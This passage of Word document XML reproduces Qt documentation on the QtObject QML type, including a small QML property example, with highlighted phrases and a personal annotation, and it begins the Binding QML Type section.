          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which contains </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only the</w:t>
      </w:r>
      <w:r w:rsidR="00A50E12">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1508" w:anchor="objectName-prop" w:history="1">
        <w:r w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>objectName</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A50E12">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It can be </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1509" w:history="1">
        <w:r w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if you need an </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>extremely lightweight type to enclose a set of custom properties</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF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2FF8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="00490E7E" w:rsidP="007C2FF8">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510" w:history="1">
        <w:r w:rsidR="007C2FF8" w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C2FF8" w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C2FF8" w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId1511" w:history="1">
        <w:r w:rsidRPr="000821BB">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="262626"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject</w:t>
        </w:r>
      </w:hyperlink>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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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id</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attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1512" w:history="1">
        <w:r w:rsidRPr="000821BB">
          <w:rPr>
            <w:rStyle w:val="pln"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="262626"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>variant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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7C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF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2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId1513" w:history="1">
        <w:r w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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text</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attributes</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name </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00A50E12" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It can also be </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful for C++ integration</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as it is just a plain</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1514" w:history="1">
        <w:r w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1515" w:history="1">
        <w:r w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for further details.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this purpose.</w:t>
      </w:r>
      <w:r w:rsidR="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1516" w:history="1">
        <w:r w:rsidR="007C2FF8" w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtqml-binding.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="00A50E12" w:rsidRDefault="007C2FF8" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1213" w:name="_Toc483000783"/>
      <w:bookmarkStart w:id="1214" w:name="_Toc483003781"/>
      <w:bookmarkStart w:id="1215" w:name="_Toc483604135"/>
      <w:bookmarkStart w:id="1216" w:name="_Toc483605355"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1213"/>
      <w:bookmarkEnd w:id="1214"/>
      <w:bookmarkEnd w:id="1215"/>
      <w:bookmarkEnd w:id="1216"/>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1217" w:name="_Toc483000784"/>
      <w:bookmarkStart w:id="1218" w:name="_Toc483003782"/>
      <w:bookmarkStart w:id="1219" w:name="_Toc483604136"/>
      <w:bookmarkStart w:id="1220" w:name="_Toc483605356"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1217"/>
      <w:bookmarkEnd w:id="1218"/>
      <w:bookmarkEnd w:id="1219"/>
      <w:bookmarkEnd w:id="1220"/>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
